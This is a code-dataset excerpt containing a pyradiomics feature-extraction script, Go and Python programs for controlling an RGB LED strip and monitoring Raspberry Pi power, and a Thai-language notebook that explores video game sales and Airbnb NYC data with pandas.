},\n { 7, 8, 0, 7, 0, 6, 3, 11, 0, 11, 6, 0, -1, -1, -1, -1 },\n { 7, 11, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 }\n};\n\n// Vertlist represents the location of some point somewhere on an edge of the cube, relative to the origin (0, 0, 0).\n// As the points on the cube are always either 0 or 1 (masked/not-masked) that other point is always halfway.\n// Therefore, vertlist is constant and can be defined static (only works when the intersection point is constant\n// (in this case the intersection point is always 0.5). The edge represented is defined by the gridAngle points as follows:\n// { { 1, 0 }, { 2, 1 }, { 3, 2 }, { 3, 0 },\n// { 5, 4 }, { 6, 5 }, { 7, 6 }, { 7, 4 },\n// { 4, 0 }, { 5, 1 }, { 6, 2 }, { 7, 0 } }\nstatic const double vertList[12][3] = { { 0, 0, 0.5 }, { 0, 0.5, 1 }, { 0, 1, 0.5 }, { 0, 0.5, 0 },\n { 1, 0, 0.5 }, { 1, 0.5, 1 }, { 1, 1, 0.5 }, { 1, 0.5, 0 },\n { 0.5, 0, 0 }, { 0.5, 0, 1 }, { 0.5, 1, 1 }, { 0.5, 1, 0 } };\n" }, { "alpha_fraction": 0.6897942423820496, "alphanum_fraction": 0.6918798685073853, "avg_line_length": 35.693878173828125, "blob_id": "c3816856c750a49291a6a87ce2dc817c665721f5", "content_id": "b21b6503235c5bf8952330ea14b90a6fa3e6e89e", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7192, "license_type": "permissive", "max_line_length": 120, "num_lines": 196, "path": "/radiomics/scripts/segment.py", "repo_name": "drmaxchen/pyradio", "src_encoding": "UTF-8", "text": "from collections import OrderedDict\nimport csv\nfrom datetime import datetime\nfrom functools import partial\nimport json\nimport logging\nimport os\nimport threading\n\nimport numpy\nimport SimpleITK as sitk\nimport six\n\nfrom radiomics import featureextractor, setVerbosity\n\ncaseLogger = logging.getLogger('radiomics.script')\n\n\ndef extractSegment(case_idx, case, config, config_override):\n global caseLogger\n\n # Instantiate the output\n feature_vector = OrderedDict(case)\n\n try:\n t = datetime.now()\n\n imageFilepath = case['Image'] # Required\n maskFilepath = case['Mask'] # Required\n label = case.get('Label', None) # Optional\n if isinstance(label, six.string_types):\n label = int(label)\n\n # Instantiate Radiomics Feature extractor\n extractor = featureextractor.RadiomicsFeaturesExtractor(config, **config_override)\n\n # Extract features\n feature_vector.update(extractor.execute(imageFilepath, maskFilepath, label))\n\n # Display message\n delta_t = datetime.now() - t\n caseLogger.info('Patient %s processed in %s', case_idx, delta_t)\n\n except Exception:\n caseLogger.error('Feature extraction failed!', exc_info=True)\n\n return feature_vector\n\n\ndef extractSegment_parallel(args, parallel_config=None):\n if parallel_config is not None:\n _configurParallelExtraction(parallel_config)\n # set thread name to patient name\n threading.current_thread().name = 'case %s' % args[0] # args[0] = case_idx\n return extractSegment(*args)\n\n\ndef extractSegmentWithTempFiles(case_idx, case, config, config_override, temp_dir):\n global caseLogger\n\n filename = os.path.join(temp_dir, 'features_%s.csv' % case_idx)\n if os.path.isfile(filename):\n # Output already generated, load result (prevents re-extraction in case of interrupted process)\n with open(filename, 'w') as outputFile:\n reader = csv.reader(outputFile)\n headers = reader.rows[0]\n values = reader.rows[1]\n feature_vector = OrderedDict(zip(headers, values))\n\n caseLogger.info('Patient %s already processed, reading results...', case_idx)\n else:\n # Extract the set of features. Set parallel_config flag to None, as any logging initialization is already handled.\n feature_vector = extractSegment(case_idx, case, config, config_override)\n\n # Store results in temporary separate files to prevent write conflicts\n # This allows for the extraction to be interrupted. Upon restarting, already processed cases are found in the\n # TEMP_DIR directory and loaded instead of re-extracted\n with open(filename, 'w') as outputFile:\n writer = csv.DictWriter(outputFile, fieldnames=list(feature_vector.keys()), lineterminator='\\n')\n writer.writeheader()\n writer.writerow(feature_vector)\n\n return feature_vector\n\n\ndef extractSegmentWithTempFiles_parallel(args, parallel_config=None):\n if parallel_config is not None:\n _configurParallelExtraction(parallel_config)\n # set thread name to patient name\n threading.current_thread().name = 'case %s' % args[0] # args[0] = case_idx\n return extractSegmentWithTempFiles(*args)\n\n\ndef processOutput(results,\n outStream,\n skip_nans=False,\n format_output='csv',\n format_path='absolute',\n relative_path_start=''):\n global caseLogger\n caseLogger.info('Processing results...')\n\n # Store the header of all calculated features\n headers = results[0].keys()\n\n # Set the formatting rule for image and mask paths\n if format_path == 'absolute':\n pathFormatter = os.path.abspath\n elif format_path == 'relative':\n pathFormatter = partial(os.path.relpath, start=relative_path_start)\n elif format_path == 'basename':\n pathFormatter = os.path.basename\n else:\n caseLogger.warning('Unrecognized format for paths (%s), reverting to default (\"absolute\")', format_path)\n pathFormatter = os.path.abspath\n\n for case_idx, case in enumerate(results, start=1):\n # if specified, skip NaN values\n if skip_nans:\n for key in list(case.keys()):\n if isinstance(case[key], float) and numpy.isnan(case[key]):\n caseLogger.debug('Case %d, feature %s computed NaN, removing from results', case_idx, key)\n del case[key]\n\n # Format paths of image and mask files\n case['Image'] = pathFormatter(case['Image'])\n case['Mask'] = pathFormatter(case['Mask'])\n\n # Write out results\n if format_output not in ('csv', 'json', 'txt'):\n caseLogger.warning('Unrecognized format for output (%s), reverting to default (\"csv\")', format_output)\n format_output = 'csv'\n\n if format_output == 'csv':\n writer = csv.DictWriter(outStream, headers, lineterminator='\\n')\n if case_idx == 1:\n writer.writeheader()\n writer.writerow(case) # if skip_nans is enabled, nan-values are written as empty strings\n elif format_output == 'json':\n json.dump(case, outStream)\n outStream.write('\\n')\n else: # txt\n for k, v in six.iteritems(case):\n outStream.write('Case-%d_%s: %s\\n' % (case_idx, k, v))\n\n\ndef _configurParallelExtraction(parallel_config):\n \"\"\"\n Initialize logging for parallel extraction. This needs to be done here, as it needs to be done for each thread that is\n created.\n \"\"\"\n # Configure logging\n ###################\n\n rLogger = logging.getLogger('radiomics')\n\n # Add logging to file is specified\n logFile = parallel_config.get('logFile', None)\n if logFile is not None:\n logHandler = logging.FileHandler(filename=logFile, mode='a')\n logHandler.setLevel(parallel_config.get('logLevel', logging.INFO))\n rLogger.addHandler(logHandler)\n\n # Include thread name in Log-message output for all handlers.\n parallelFormatter = logging.Formatter('[%(asctime)-.19s] %(levelname)-.1s: (%(threadName)s) %(name)s: %(message)s')\n for h in rLogger.handlers:\n h.setFormatter(parallelFormatter)\n\n if parallel_config.get('addFilter', True):\n # Define filter that allows messages from specified filter and level INFO and up, and level WARNING and up from\n # other loggers.\n class info_filter(logging.Filter):\n def __init__(self, name):\n super(info_filter, self).__init__(name)\n self.level = logging.WARNING\n\n def filter(self, record):\n if record.levelno >= self.level:\n return True\n if record.name == self.name and record.levelno >= logging.INFO:\n return True\n return False\n\n # Adding the filter to the first handler of the radiomics logger limits the info messages on the output to just\n # those from radiomics.script, but warnings and errors from the entire library are also printed to the output.\n # This does not affect the amount of logging stored in the log file.\n outputhandler = rLogger.handlers[0] # Handler printing to the output\n outputhandler.addFilter(info_filter('radiomics.script'))\n\n # Ensures that log messages are being passed to the filter with the specified level\n setVerbosity(parallel_config.get('verbosity', logging.INFO))\n\n # Ensure the entire extraction for each cases is handled on 1 thread\n ####################################################################\n\n sitk.ProcessObject_SetGlobalDefaultNumberOfThreads(1)\n" } ]
5
thethorne48/rgb_test
https://github.com/thethorne48/rgb_test
99e055fe68d7dcbe1c324cfaeeb320810a7df915
7dae84c89dd41dad68d2ecf0bd91ca3a317f5851
396b35cd8fe16701bc7fea8d6cc5fa2608bd24f1
refs/heads/master
2020-06-23T19:25:32.667070
2019-08-12T22:16:00
2019-08-12T22:16:00
198,731,320
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5663924813270569, "alphanum_fraction": 0.6180963516235352, "avg_line_length": 18.19548797607422, "blob_id": "28a5ec47a5d2e725f473d65ba2a6e6190ea1693e", "content_id": "33f3bff1121c96c236daee8e53f72b8853bb7566", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2553, "license_type": "permissive", "max_line_length": 63, "num_lines": 133, "path": "/rgb/old/rainbow.go", "repo_name": "thethorne48/rgb_test", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"fmt\"\n\t\"math\"\n\t\"os\"\n\t\"time\"\n\n\t\"github.com/jgarff/rpi_ws281x/golang/ws2811\"\n)\n\nconst (\n\tpin = 18\n\tcount = 150\n\tbrightness = 100\n\tmaxAngle = 360\n)\n\n// RGB - a set of arrays to hold pre-calculated RGB values\ntype RGB struct {\n\tred []uint8\n\tgreen []uint8\n\tblue []uint8\n}\n\nfunc main() {\n\tdefer ws2811.Fini()\n\tcolorValues := initRange(count)\n\terr := ws2811.Init(pin, count, brightness)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfmt.Println(\"Press Ctr-C to quit.\")\n\n\t\tfmt.Println(\"Creating cosine rainbow\")\n\t\tfor index := 0; index <= 1000; index++ {\n\t\t\terr = rainbowCosCycle(colorValues, index)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error during cycle \" + err.Error())\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\t\t}\n\n\t\tfmt.Println(\"Creating color flash\")\n\t\tcolors := [...]uint32{\n\t\t\t0xFF0000, // green\n\t\t\t0x888800, // yellow\n\t\t\t0x00FF00, // red\n\t\t\t0x00FFFF, // purple\n\t\t\t0x0000FF, // blue\n\t\t\t0xFF00FF, // cyan\n\t\t}\n\t\tfor i := 0; i < len(colors); i++ {\n\t\t\terr = colorFlash(colors[i])\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error during flash \" + err.Error())\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\t\t}\n\n\t}\n}\n\nfunc initRange(ledCount int) RGB {\n\tfloats := RGB{\n\t\tred: []uint8{},\n\t\tgreen: []uint8{},\n\t\tblue: []uint8{},\n\t}\n\n\tsegmentSize := (math.Pi * 3) / float64(ledCount)\n\tmaxBrightness := float64(180)\n\tpiDivision := float64(2)\n\n\tfor i := math.Pi * -1; i <= math.Pi*2; i += segmentSize {\n\t\tred := math.Sin(i/piDivision + math.Pi/2)\n\t\tblue := math.Sin(i / piDivision)\n\t\tfloats.red = SinAppend(floats.red, red, maxBrightness)\n\t\tfloats.blue = SinAppend(floats.blue, blue, maxBrightness)\n\t\tif i <= 0 {\n\t\t\tgreen := math.Sin(i/piDivision + math.Pi)\n\t\t\tfloats.green = SinAppend(floats.green, green, maxBrightness)\n\t\t} else {\n\t\t\tgreen := math.Sin(i/piDivision - math.Pi/2)\n\t\t\tfloats.green = SinAppend(floats.green, green, maxBrightness)\n\t\t}\n\t}\n\n\treturn floats\n}\n\nfunc rainbowCosCycle(floats RGB, seed int) error {\n\tfor i := 0; i < count; i++ {\n\t\tws2811.SetLed(i, RainbowCosColor(floats, i+seed))\n\t}\n\terr := ws2811.Render()\n\tif err != nil {\n\t\tws2811.Clear()\n\t\treturn err\n\t}\n\ttime.Sleep(5 * time.Millisecond)\n\treturn nil\n}\n\nfunc colorWipe(color uint32) error {\n\tfor i := 0; i < count; i++ {\n\t\tws2811.SetLed(i, color)\n\t\terr := ws2811.Render()\n\t\tif err != nil {\n\t\t\tws2811.Clear()\n\t\t\treturn err\n\t\t}\n\n\t\ttime.Sleep(5 * time.Millisecond)\n\t}\n\n\treturn nil\n}\n\nfunc colorFlash(color uint32) error {\n\tfor i := 0; i < count; i++ {\n\t\tws2811.SetLed(i, color)\n\t}\n\terr := ws2811.Render()\n\tif err != nil {\n\t\tws2811.Clear()\n\t\treturn err\n\t}\n\n\ttime.Sleep(5 * time.Second)\n\n\treturn nil\n}\n" }, { "alpha_fraction": 0.5610389709472656, "alphanum_fraction": 0.5896103978157043, "avg_line_length": 20.38888931274414, "blob_id": "131f3fcac07c3b4aa6be92e53a94590b56121a22", "content_id": "851523451d172cff58083458fc30d41c1c9c6617", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 385, "license_type": "permissive", "max_line_length": 59, "num_lines": 18, "path": "/power_test.py", "repo_name": "thethorne48/rgb_test", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport RPi.GPIO as GPIO\nimport time\n\nredLED = 35\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(redLED, GPIO.IN)\n\npowerlow = 0\nwhile True:\n if(GPIO.input(redLED) == 0):\n print(\"POWER dipped below 4.63V\")\n powerlow += 1\n else:\n powerlow = 0\n if (powerlow > 3):\n print(f\"Low power for {str(powerlow)} seconds\")\n time.sleep(1)\n" }, { "alpha_fraction": 0.7555555701255798, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 44.25, "blob_id": "09dcfc4ae1ce33ca28d1ad07f206d712897aa543", "content_id": "b1557bdff751bfaebdb73ad58cc6674ac0be4b26", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 180, "license_type": "permissive", "max_line_length": 129, "num_lines": 4, "path": "/README.md", "repo_name": "thethorne48/rgb_test", "src_encoding": "UTF-8", "text": "# rgb_test\nTesting controlling an RGB light strip\n\n[![Snap Status](https://build.snapcraft.io/badge/thethorne48/rgb_test.svg)](https://build.snapcraft.io/user/thethorne48/rgb_test)" }, { "alpha_fraction": 0.5649484395980835, "alphanum_fraction": 0.6061855554580688, "avg_line_length": 17.417720794677734, "blob_id": "8732eb68f314fcd63f4b57c3ea2874ca983eec4c", "content_id": "c0a8f68a61ddc40f302a4b661b63279dbaab9f2f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1455, "license_type": "permissive", "max_line_length": 57, "num_lines": 79, "path": "/rgb/rgb.go", "repo_name": "thethorne48/rgb_test", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"fmt\"\n\t\"os\"\n\t\"time\"\n\n\tws \"github.com/rpi-ws281x/rpi-ws281x-go\"\n)\n\nconst (\n\tpin = 18\n\tcount = 150\n\tbrightness = 100\n)\n\n// main test program\nfunc main() {\n\topt := ws.DefaultOptions\n\topt.Channels[0].LedCount = count\n\topt.Channels[0].Brightness = brightness\n\n\tled, err := ws.MakeWS2811(&opt)\n\tif err != nil {\n\t\t// desc := ws.StatusDesc(err.)\n\t\tpanic(err)\n\t}\n\terr = led.Init()\n\tdefer led.Fini()\n\tif err != nil {\n\t\t// desc := ws.StatusDesc(err.)\n\t\tpanic(err)\n\t}\n\n\tfmt.Println(\"Press Ctr-C to quit.\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfor ok := true; ok; {\n\t\t\tfmt.Println(\"Creating blue color wipe\")\n\t\t\terr = colorWipe(led, uint32(0x000020))\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error during wipe \" + err.Error())\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\n\t\t\tfmt.Println(\"Creating red color wipe\")\n\t\t\terr = colorWipe(led, uint32(0x002000))\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error during wipe \" + err.Error())\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\n\t\t\tfmt.Println(\"Creating green color wipe\")\n\t\t\terr = colorWipe(led, uint32(0x200000))\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error during wipe \" + err.Error())\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\t\t}\n\t}\n}\n\nfunc colorWipe(instance *ws.WS2811, color uint32) error {\n\tcolors := instance.Leds(0)\n\tfor i := 0; i < count; i++ {\n\t\tcolors[i] = color\n\t\terr := instance.SetLedsSync(0, colors)\n\t\terr = instance.Render()\n\t\tif err != nil {\n\t\t\tinstance.Wait()\n\t\t\treturn err\n\t\t}\n\n\t\ttime.Sleep(5 * time.Millisecond)\n\t}\n\n\treturn nil\n}\n" } ]
4
benjaratc/Project1-Python-
https://github.com/benjaratc/Project1-Python-
4286548201e531ea957890d45f2653c108588ae7
3f4962da735480cd4706cb1db54cd90bd375d09a
9a93a0f642dbb0688bdeda5746c973a9b62eadc2
refs/heads/master
2022-09-10T00:17:50.857201
2020-05-29T13:13:24
2020-05-29T13:13:24
267,849,521
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6097561120986938, "alphanum_fraction": 0.6585366129875183, "avg_line_length": 7.199999809265137, "blob_id": "cf1888079f1c9f2238951987995ddfe381615f6b", "content_id": "f2b1ac2b36d0f268203b9842869553b91afe11b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "no_license", "max_line_length": 18, "num_lines": 5, "path": "/README.md", "repo_name": "benjaratc/Project1-Python-", "src_encoding": "UTF-8", "text": "# Project1-Python-\n\nData Camp 2 \n\nBenjarat Chavanabutvilai\n" }, { "alpha_fraction": 0.5995112657546997, "alphanum_fraction": 0.6464457511901855, "avg_line_length": 17.549333572387695, "blob_id": "f08e0996c3a9f14cbbd0de745f5673aeb85c995f", "content_id": "8502e44505499aa892738482becf3f3f873d281b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19305, "license_type": "no_license", "max_line_length": 169, "num_lines": 750, "path": "/Project 1 Capstone .py", "repo_name": "benjaratc/Project1-Python-", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# Part 1 \n\n# 1. จงเขียนโปรแกรมรับค่า Input จากผู้ใช้ ถ้าผู้ใช้ใส่ 0.0 จึงจะสิ้นสุดโปรแกรม คำนวณหาค่าเฉลี่ยของเลขทั้งหมดที่ผู้ใช้ใส่ และปริ้นค่าเฉลี่ยคูณด้วยจำนวนครั้งที่ใส่ทั้งหมด \n\n# In[7]:\n\n\nCount = 0\nSum = 0 \n\nnum = float(input('ใส่ตัวเลขใดๆ (ถ้าใส่ 0.0 สิ้นสุดโปรแกรม ) :')) \n\nwhile num != 0.0:\n Sum = Sum + num\n Count +=1\n num = float(input('ใส่ตัวเลขใดๆ (ถ้าใส่ 0.0 สิ้นสุดโปรแกรม ) :')) \n\navg = Sum/Count \nprint(avg*Count)\nprint('Finished')\n\n\n# 2. จงเขียนโปรแกรมให้ผู้ใช้ใส่เลข ขอบเขตล่าง และ ขอบเขตบน และคำนวณหาเลขจำนวนเฉพาะ (Prime Number) ที่อยู่ระหว่างขอบเขตล่างและขอบเขตบน\n\n# In[735]:\n\n\nlow_bound = int(input('Enter a low bound number :')) #if_else \nup_bound = int(input('Enter a high bound number :')) \n\nfor num in range(low_bound,up_bound +1): \n if num > 1:\n for i in range(2,num):\n if num % i == 0:\n break \n else:\n print('%d is a prime number' %(num))\n\n# %s - String (or any object with a string representation, like numbers)\n# %d - Integers\n# %f - Floating point numbers \n\n\n# Part 2 : Video Game Sales \n\n# In[46]:\n\n\nimport numpy as np\nimport pandas as pd \nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport seaborn as sns\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n\n# 1. Import ไฟล์ vgsales เช็คข้อมูลเบื้องต้น\n\n# In[183]:\n\n\ndf = pd.read_csv('../Desktop/DataCamp/vgsales.csv')\ndf.head()\n\n\n# In[185]:\n\n\ndf.info()\n\n\n# In[181]:\n\n\ndf.describe()\n\n\n# 2. สุ่มอ่านข้อมูล 10 แถว หัว 5 แถว และท้าย 10 แถว\n\n# In[57]:\n\n\ndf.sample(10)\n\n\n# In[55]:\n\n\ndf.head(5)\n\n\n# In[56]:\n\n\ndf.tail(10)\n\n\n# 3. หา Top 10 Platform ยอดฮิต พร้อมระบุจำนวน\n\n# In[187]:\n\n\ncountPlatform = df['Platform'].value_counts() #df['Platform'].value_counts().head(10)\ncountPlatform.head(10)\n\n\n# 4. หา Bottom 10 Platform ยอดฮิต พร้อมระบุจำนวน\n\n# In[75]:\n\n\ncountPlatform = df['Platform'].value_counts()\ncountPlatform.tail(10)\n\n\n# 5. หา Top 10 Platform ชนิดของเกมส์ยอดฮิต พร้อมระบุจำนวน \n\n# In[77]:\n\n\ngroupPlatform = df['Genre'].value_counts()\ncountGenre.head(10)\n\n\n# 6. หา Bottom 10 Platform ชนิดของเกมส์ยอดฮิต พร้อมระบุจำนวน\n\n# In[78]:\n\n\ncountGenre = df['Genre'].value_counts()\ncountGenre.tail(10)\n\n\n# 7. หารายละเอียดเกมส์ GTA V ภาคต่างๆ ทั้งหมด \n\n# In[190]:\n\n\ndf[df['Name'] == 'Grand Theft Auto V']\n\n\n# 8. หาจำนวนเกมส์ที่มีชื่อซ้ำกันทั้งหมด\n\n# In[208]:\n\n\ndf[df['Name'].duplicated(keep = False)].sort_values('Name') #keep = False คือซ้ำกันหมดจะออกมาอยู่ด้วย\n\n\n# 9. หาจำนวนเกมส์ที่มีชื่อและ Platform ซ้ำกันทั้งหมด\n\n# In[210]:\n\n\ndf[df[['Name','Platform']].duplicated(keep = False)].sort_values('Name')\n\n\n# 10. จากข้อ 9 พิจารณาแถวที่ข้อมูลซ้ำแและลบแถวนั้น\n\n# In[225]:\n\n\ndf_new = df.drop(df.index[[16127,14999,4145]]) #or inplace = True\ndf_new.head()\n\n\n# 11. หารายได้ทั้งหมดเกมส์ FIFA 15\n\n# In[313]:\n\n\ndf2 = df_new.groupby('Name').sum().reset_index()\ndf2\n\n\n# In[231]:\n\n\ndf2[df2['Name'] == 'FIFA 15']\n\n\n# 12. หารายได้ทั้งหมดของเกมส์ GTA V ในญี่ปุ่น\n\n# In[232]:\n\n\ndf2[df2['Name'] == 'Grand Theft Auto V']\n\n\n# 13. สร้าง DF ที่ให้ index เป็นรายชื่อของเกมส์ที่มีซ้ำ และ Column เป็นจำนวนที่มีซ้ำ ไม่นับที่เป็น Unique\n\n# In[385]:\n\n\ncount = df_new['Name'].value_counts()\ncount = pd.DataFrame(count)\ncount = count[count['Name']>1]\ncount.rename(columns = {'Name':'Count'})\n\n\n# 14. สร้าง DF ที่มี index เป็นชื่อบริษัท และเรียงลำดับตามรายได้รวมจากมากไปน้อย\n\n# In[393]:\n\n\npublisher = df_new.groupby('Publisher').sum().sort_values('Global_Sales')[::-1]\npublisher = publisher['Global_Sales']\npublisher = pd.DataFrame(publisher).reset_index()\npublisher\n\n\n# 15. จงสร้าง DF ที่บรรจุเกมส์ Series Call of duty ทั้งหมด\n\n# In[416]:\n\n\ncallOfDuty = df_new[df_new['Name'].apply(lambda check: check[0:12] == 'Call of Duty')]\ncallOfDuty\n\n\n# 16. จงหาว่า Call of Duty ภาคใดใน PC มีรายสูงสุดในยุโรป 5 อันดับแรก\n\n# In[420]:\n\n\nPC = callOfDuty[callOfDuty['Platform']=='PC'].sort_values('EU_Sales')[::-1].head(5)\nPC\n\n\n# 17. จงหาว่า Platform ใด มียอดขายรวมสูงสุดในยุโรป\n\n# In[242]:\n\n\ndf_new.groupby('Platform').sum().sort_values('EU_Sales')[::-1].head(1)\n\n\n# 18. จงหาว่าเกมส์ประเภทใดมียอดขายเฉลี่ยสูงสุดในภูมิภาคอื่นๆรอบโลก\n\n# In[243]:\n\n\ndf_new.groupby('Genre').sum().sort_values('Global_Sales')[::-1].head(1)\n\n\n# 19. สร้าง Bar Plot โดยให้แกน X เป็น Platform และ Y เป็นยอดขายทั่วโลก\n\n# In[334]:\n\n\nfig = plt.figure(figsize = (18,10))\nsns.barplot(data = df_new, x ='Platform', y = 'Global_Sales')\n\n\n# 20. สร้าง Pie Chart หาส่วนแบ่งทางการตลาดของ 5 บริษัทแรกที่มีรายได้มากที่สุด\n\n# In[421]:\n\n\nTop5MarketShare = df.groupby('Publisher').sum().sort_values('Global_Sales')[::-1].head(5)\nTop5MarketShare\n\n\n# In[422]:\n\n\nfig = px.pie(Top5MarketShare, values = 'Global_Sales', names = Top5MarketShare.index)\nfig.show()\n\n\n# 21. สร้าง Count Plot นับข้อมูลประเภทของเกมส์\n\n# In[423]:\n\n\nfig = plt.figure(figsize = (22,8))\nsns.countplot(x='Genre', data = df_new)\nfig.show()\n\n\n# 22. สร้าง Bar plot Top 5 รายได้ทั่วโลกของ Call of Duty ภาคต่างๆใน Xbox\n\n# In[449]:\n\n\ntop5callOfDuty = callOfDuty[callOfDuty['Platform'] == 'X360'].sort_values('Global_Sales')[::-1].head(5)\ntop5callOfDuty\n\n\n# In[446]:\n\n\nfig = plt.figure(figsize = (20,8))\nsns.barplot(data = top5callOfDuty, x = 'Name', y = 'Global_Sales')\nfig.show()\n\n\n# 23. สร้าง Line Graph แสดงรายได้จาก North America จากปีแรกถึงปีสุดท้าย\n\n# In[286]:\n\n\nyear = df.groupby('Year').sum()\nyear.head()\n\n\n# In[451]:\n\n\nfig = px.line(year, y = 'NA_Sales', x = year.index, title = 'NA Sales', labels = {'x':'Year'})\nfig.show()\n\n\n# 24. สร้าง Stripplot โดยให้แกน X เป็น Genre และ แกน Y เป็นรายได้ทั่วโลก\n\n# In[458]:\n\n\nfig = plt.figure(figsize = (20,8))\nsns.stripplot(x = 'Genre', y = 'Global_Sales',data = df_new)\nfig.show()\n\n\n# 25. สร้าง Distribution Plot ของปี\n\n# In[459]:\n\n\nfig = plt.figure(figsize = (20,8))\nsns.distplot(df['Year'])\n\n\n# 26. สร้าง Bar Plot แสดงรายได้รวมในญี่ปุ่นรายปี\n\n# In[340]:\n\n\nJapan_Sales = df_new.groupby('Year').sum()\nJapan_Sales.head()\n\n\n# In[344]:\n\n\nfig = plt.figure(figsize = (20,8))\nsns.barplot(data = Japan_Sales, x = Japan_Sales.index, y = 'JP_Sales')\nfig.autofmt_xdate()\nfig.show()\n\n\n# Part 2: Airbnb\n\n# 1. Import ไฟล์ AB_NYC_2019 และ เช็คข้อมูลเบื้องต้น\n\n# In[353]:\n\n\nbnb = pd.read_csv('../Desktop/DataCamp/AB_NYC_2019.csv')\nbnb.head()\n\n\n# In[463]:\n\n\nbnb.info()\n\n\n# 2. สุ่มอ่านข้อมูล 10 แถว หัว 5 แถว และท้าย 10 แถว\n\n# In[354]:\n\n\nbnb.sample(10)\n\n\n# In[355]:\n\n\nbnb.head(5)\n\n\n# In[356]:\n\n\nbnb.tail(10)\n\n\n# 3. หา Top 10 Neighbourhood ยอดฮิต พร้อมระบุจำนวน\n\n# In[466]:\n\n\ncountNeighbourhood = bnb['neighbourhood'].value_counts()\ncountNeighbourhood = pd.DataFrame(countNeighbourhood)\ncountNeighbourhood = countNeighbourhood.rename(columns = {'neighbourhood':'count'})\ncountNeighbourhood.head()\n\n\n# 4. หา Bottom 10 Neighbourhood ยอดฮิต พร้อมระบุจำนวน\n\n# In[491]:\n\n\ncountNeighbourhood = bnb.groupby('neighbourhood').size().reset_index(name = 'count').sort_values('count')[::-1]\ncountNeighbourhood.tail(10)\n\n\n# 5. หา Top 10 Neighbourhood Group ยอดฮิต พร้อมระบุจำนวน\n\n# In[359]:\n\n\ncountNeighbourhoodGroup = bnb['neighbourhood_group'].value_counts()\ncountNeighbourhoodGroup.head(10)\n\n\n# 6. หา Bottom 10 Neighbourhood Group ยอดฮิต พร้อมระบุจำนวน\n\n# In[360]:\n\n\ncountNeighbourhoodGroup = bnb['neighbourhood_group'].value_counts()\ncountNeighbourhoodGroup.tail(10)\n\n\n# 7. หาค่าเฉลี่ยราคาของพื้นที่ และเขต\n\n# In[361]:\n\n\ngroupby_neighbourhood_group = bnb.groupby('neighbourhood_group').mean()\ngroupby_neighbourhood_group['price'] #bnb.groupby('neighbourhood_group').mean()['price'] \n\n\n# In[497]:\n\n\ngroupby_neighbourhood = bnb.groupby('neighbourhood').mean().reset_index()[['neighbourhood','price']].sort_values('price')[::-1]\ngroupby_neighbourhood\n\n\n# 8. จงหาว่าห้องประเภทใดมีราคาเฉลี่ยมากที่สุด\n\n# In[363]:\n\n\ngroupby_roomtype = bnb.groupby('room_type').mean()\ngroupby_roomtype['price']\n\n\n# 9. จงหาว่าพื้นที่ใดมีข้อมูลพื้นที่อยู่แค่หน่วยเดียว\n\n# In[364]:\n\n\ncountNeighbourhood[countNeighbourhood ==1]\n\n\n# 10. จงหาว่าที่พักแบบใดมีการให้บริการมากที่สุด และมากเท่าใด\n\n# In[505]:\n\n\nroom_type = bnb['room_type'].value_counts()\nroom_type = pd.DataFrame(room_type)\nroom_type = room_type.rename(columns = {'room_type':'count'})\nroom_type\n\n\n# 11. จงหาว่าพื้นที่ใดมีจำนวนรีวิวมากที่สุด และ เขตใดมีจำนวนรีวิวมากที่สุด\n\n# In[513]:\n\n\nbnb.groupby('neighbourhood').sum().sort_values('number_of_reviews')[::-1].head(1)\n\n\n# In[515]:\n\n\nbnb.groupby('neighbourhood_group').sum().sort_values('number_of_reviews')[::-1].head(1)\n\n\n# 12. จงหา Top 3 จำนวน Minimum Nights ที่มีเขตไม่ซ้ำกัน\n\n# In[520]:\n\n\nbnb.sort_values('minimum_nights')[::-1].drop_duplicates('neighbourhood_group').head(3)\n\n\n# 13. จงหาชื่อ Host ที่ลิสที่อยู่มากที่สุด 10 อันดับแรก (Hint: ใช้ชื่อไม่ได้)\n\n# In[543]:\n\n\nhost = bnb.sort_values('calculated_host_listings_count')[::-1] .drop_duplicates('calculated_host_listings_count') .head(10)\nhost[['host_id','host_name','calculated_host_listings_count']] \n\n\n# 14. จงหาชื่อ Host ที่มีชื่อซ้ำกันมากที่สุด 10 ชื่อ (โดยที่ไม่ใช้คนเดียวกัน)\n\n# In[563]:\n\n\nhost = bnb.sort_values('host_id')[::-1] .drop_duplicates('host_id')\nhost_duplicate = host['host_name'].value_counts()\nhost_duplicate[host_duplicate>1].head(10)\n\n\n# 15. จงหาชื่อ Host ที่มีรีวิวมากที่สุด 10 อันดับแรก\n\n# In[567]:\n\n\nbnb.groupby(['host_id','host_name'],as_index = False).sum().sort_values('number_of_reviews')[::-1].head(10)\n\n\n# 16. จงหาชื่อ Host 